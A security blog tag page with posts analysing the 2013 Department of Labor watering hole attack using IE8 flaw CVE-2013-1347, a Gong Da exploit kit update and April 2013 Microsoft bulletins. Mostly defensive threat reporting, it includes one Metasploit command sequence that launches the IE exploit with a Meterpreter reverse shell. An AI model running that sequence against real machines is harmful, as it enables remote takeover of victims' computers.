Posts tagged Microsoft
On April 30th, the watering hole campaign was published on a private mailing list and the May 1st, Invicia and AlienVault publicly reported, with technical details, that United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in watering hole attack targeting at first employees of US Dept of Energy that work in nuclear weapons programs. This malicious code was also used to gather information’s on the visitors of the compromised website.
The exploit used in this campaign was firstly reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online medias and human right activists.
Two days later, FireEye, Invicia and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792 as they originally reported but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. This turnaround had unfortunately occur to late. Casual attacker, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidences.
Microsoft has acknowledge the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140 and has provide a “Fix it” solution to mitigate Internet Explorer 8 vulnerability.
Also, Adobe has announce through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actually exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server, through “CFIDE/administrator“, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL and this vulnerability has surely be used in order to compromise the server.
Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347
Confusions with CVE-2012-4792 was possible due to similarities in used code and technics:
“function getCookieVal(offset)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function GetCookie(name)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function SetCookie(name,value)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“var ua = window.navigator.userAgent.toLowerCase()“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function DisplayInfo()” also seen in CVE-2012-4792 & CVE-2011-0611 exploits.
“function download()” & “function callback()” also seen in CVE-2012-4792 exploit.
Usage of Ajax XMLHttpRequest
Usage of HTML+TIME technic
HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792. This technic was explained by Exodus Intel beginning January 2013.
Parts of the code targets only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.
Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities
Some new particularities were present in the exploit and associated watering hole campaign:
Usage of PHP files
Usage of Base64 obfuscation
Obfuscation with base64 encoding (“base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 was using “robots.txt” obfuscated with substitutions and HEX encoding.
As mentioned by sinn3r of Metasploit team, CVE-2012-4792 was a CButton object use-after-free and CVE-2013-1347 is a CGenericElement object use-after-free.
dol[.]ns01[.]us Exploit Hosting Domain Evolutions
You can observe this evolution with the urlQuery submission of 2013-04-30.
All these urlQuery submission’s were done with a non Internet Explorer 8 user agent, and as the exploit malicious code was designed to only target Windows XP and Internet Explorer 8, part of the redirection were not present as evidences.
The first inclusion “/web/xss.php” was used in order to gather information’s on the DOL website visitors and the second inclusion “/update/index.php” was used to start the exploitation of CVE-2013-1347.
Information Gathering Scripts
DOL Information Gathering Functions
|jstocreate()||Internet Explorer||Test the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012, Kaspersky 2013 anti-viruses.|
|flashver()||Internet Explorer & Firefox & Chrome||Test the presence and version of Adobe Flash, and supported OS.|
|officever()||Internet Explorer||Test the presence and version of Microsoft Office|
|plugin_pdf_ie()||Internet Explorer||Test the presence of Adobe Reader|
|bitdefender2012check()||Internet Explorer & Firefox & Chrome||Test the presence of BitDefender 2012 and try to disable it through disabledbitdefender_2012() function.|
|java()||Internet Explorer & Firefox & Chrome||Test the presence and version of Oracle Java plug-in|
|xunleicheck()||Firefox & Chrome||Test the presence of xThunder Chrome extension, an extension managing popular downloaders.|
|kavcheck()||Firefox & Chrome||Test the presence of Kaspersky Chrome extension|
|fiddlercheck()||Firefox & Chrome||Test the presence of Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application|
|liveheadercheck()||Firefox & Chrome||Test the presence of Live HTTP Header Chrome extension|
|webdevelopercheck()||Firefox & Chrome||Test the presence of Web Developer Chrome extension|
|avg2012check()||Firefox & Chrome||Test the presence of AVG 2012 Chrome extension|
|tamperdatacheck()||Firefox & Chrome||Test the presence of Tamper data Chrome extension|
|adblockcheck()||Firefox & Chrome||Test the presence of Adblocker Chrome extension|
|avastcheck()||Firefox & Chrome||Test the presence of Avast! Chrome extention|
|pluginverother()||Firefox & Chrome||Test the presence of all installed modules|
Also a specific information gathering technic was triggered when Internet Explorer was used. This technic is related to a non patched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.
Once all information’s gathered, the script send all data’s on a specific URL “hxxp://dol[.]ns01[.]us:8081/web/js.php” and also call “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information’s are collected.
An interesting information regarding “/web/css.js“, is that the “Last Modified” date reported by “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This is reporting that the information gathering infrastructure was in place since mid-March minimum.
Interesting facts regarding these information gathering scripts are:
- Scripts “xss.php“, “js.php” & “css.js” have move from IP 96[.]44[.]136[.]115 on port 80/TCP to domain dol[.]ns01[.]us port 8081/TCP. Move from port 80/TCP to 8081/TCP doesn’t seem to be logic, most of time outgoing connexion’s authorized on Firewalls, for corporate Web surfing, are 80/TCP and 443/TCP.
- Different types of information gathering scripts were in place, and all users who have visit DOL website were affected by this information gathering campaign.
- Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
- BitDefender 2012 deactivation attempt is confusing. Why trying to deactivate an anti-virus, this will surely generate an alert.
Information Gathered on dol[.]ns01[.]us
As described in the previous chapter, the information gathering code send a lot of information’s to the backend. Hopefully for security researchers, the backend wasn’t very well protected and all collected information’s were accessible without any restrictions in different web folders. You can find here under some statistics related to the gathered information’s.
Complete geolocation of the targeted source IPs
By analyzing the information’s sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:
- From 2013-03-15 to 2013-04-29 : University Research Co. Cambodia website (www.urccambodia.org) was the first target .This explain the high number of distinct IP addresses from Cambodia.
- From 2013-04-08 to 2013-04-24 : Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of Fraser Institute, was the second target.
- From 2013-04-08 to 2013-04-24 : ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
- From 2013-04-09 to 2013-04-30 : French Institute of International Relations website (www.ifri.org), was the fourth target.
- From 2013-04-09 to 2013-04-24 : The Working for America Institute website (www.workingforamerica.org), was the fifth target.
- From 2013-04-09 to 2013-04-10 : The Project 2049 Institute website (www.project2049.net), was the sixth target.
- From 2013-04-10 to 2013-04-10 : The Union Label and Service Trades Department website (www.unionlabel.org), was the seventh target.
- From 2013-04-11 to 2013-04-30 : Thales Catalogue website (components-subsystems.thales-catalogue.com), was the eighth target.
- From 2013-04-23 to 2013-05-01 : United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov), was the ninth target.
Here under the hits by browsers and Internet Explorer 8 hits by OS.
Others Information’s Gathered
As you have read in the previous chapter, ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is also present but don’t respond any more. Also if you observe the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been setup in order replace the once deactivated.
If you observe the “Last Modified” date of “css.js” file, the installation date of these files is at least the 2013-05-03.
Also, by researching some patterns matching the information’s gathering script on Google you can find some previous unknown campaigns, that were using the same code.
Watering hole campaign first reported on a private mailing list the 2013-04-30
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30
0day exploit spotted by FireEye the 2013-05-03
Microsoft Security Advisory posted the 2013-05-03
Metasploit PoC provided the 2013-05-05
PoC provided by :
Affected version(s) :
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.
use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.178.36 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
Like other Exploit Kits, Gong Da has add support for Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, has also add support for Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in an emergency patch in September 2012 and January 2013.
Here is the new code for CVE-2013-1493.
And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).
Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.
As always this new version of Gong Da Exploit Kit has been discovered on a Korean web site.
Gong Da Pack has involve to the following diagram.
Here under some information s regarding the different files:
- HcIa2.jar (aka CVE-2011-3544): 11/46 on VirusTotal.com
- bzExj6.jar (aka CVE-2012-0507): 14/45 on VirusTotal.com
- BnkLbvY3.jar (aka CVE-2012-1723): 19/46 on VirusTotal.com
- iCNpns4.jar (aka CVE-2012-4681): 28/46 on VirusTotal.com
- JdtDFRW1.jar (aka CVE-2012-5076): 16/46 on VirusTotal.com
- TolxrJG6.jar (aka CVE-2013-0422): 19/46 on VirusTotal.com
- FQxzUjYP.jar (aka CVE-2013-1493): 16/46 on VirusTotal.com
- GwDFO7.swf (aka CVE-2013-0634): 10/46 on VirusTotal.com
- xmlcoreOld.html (aka CVE-2012-1889): 18/46 on VirusTotal.com
- xml.html (aka CVE-2012-1889): 3/35 on VirusTotal.com
- xmlcoreNew.html (aka CVE-2012-1889): 10/45 on VirusTotal.com
- 4792.html (aka CVE-2012-4792): 1/46 on VirusTotal.com
- xyaKEg.html and payload.html (aka CVE-2012-4969): 5/46 on VirusTotal.com
Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on ThreatExpert)
Microsoft has release, the 9 April 2013, during his April Patch Tuesday, one updated security advisory and nine security bulletins. On the nine security bulletins two of them have a Critical security rating.
Microsoft Security Advisory 2755801
MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. KB2833510 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-11.
MS13-028 – Cumulative Security Update for Internet Explorer
MS13-028 security update, classified as Critical, allowing remote code execution, is the fix for 2 privately reported vulnerabilities in Internet Explorer. CVE-2013-1303 (6.8 CVSS base score) and CVE-2013-1304 (6.8 CVSS base score) were discovered and privately reported by Ivan Fratric and Ben Hawkes of Google Security Team.
MS13-029 – Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
MS13-029 security update, classified as Critical, allowing remote code execution, is the fix for 1 privately reported vulnerability in Windows Remote Desktop Client. CVE-2013-1296 (9.3 CVSS base score) was discovered and privately reported by c1d2d9acc746ae45eeb477b97fa74688, working with HP’s Zero Day Initiative.
MS13-030 – Vulnerability in SharePoint Could Allow Information Disclosure
MS13-030 security update, classified as Important, allowing information disclosure, is the fix for 1 publicly reported vulnerability in Microsoft SharePoint Server. CVE-2013-1290 (3.5 CVSS base score) was publicly disclosed.
MS13-031 – Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
MS13-031 security update, classified as Important, allowing elevation of privileges, is the fix for 2 privately reported vulnerabilities in Microsoft Windows. CVE-2013-1284 (4.9 CVSS base score) and CVE-2013-1294 (4.9 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc.
MS13-032 – Vulnerability in Active Directory Could Lead to Denial of Service
MS13-032 security update, classified as Important, allowing denial of service, is the fix for 1 privately reported vulnerability in Active Directory. CVE-2013-1282 (unknown CVSS base score) was discovered and privately reported.
MS13-033 – Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege
MS13-033 security update, classified as Important, allowing elevation of privileges, is the fix for 1 privately reported vulnerability. CVE-2013-1295 (5.0 CVSS base score) was discovered and privately reported by George Georgiev Valkov.
MS13-034 – Vulnerability in Microsoft Antimalware Client Could Allow Elevation of Privilege
MS13-034 security update, classified as Important, allowing elevation of privileges, is the fix for 1 privately reported vulnerability in the Microsoft Antimalware Client. CVE-2013-0078 (7.2 CVSS base score) was discovered and privately reported.
MS13-035 – Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege
MS13-035 security update, classified as Important, allowing elevation of privileges, is the fix for 1 privately reported vulnerability in the Microsoft Office. CVE-2013-1289 (4.3 CVSS base score) was discovered and privately reported by Drew Hintz of Google Security Team.
MS13-036 – Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
MS13-036 security update, classified as Important, allowing elevation of privileges, is the fix for three privately reported vulnerabilities and one publicly disclosed vulnerability in Microsoft Windows. CVE-2013-1283 (6.9 CVSS base score) and CVE-2013-1292 (6.9 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1293 (6.9 CVSS base score) was publicly disclosed by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1291 (7.1 CVSS base score) was discovered and privately reported by Wang Yu.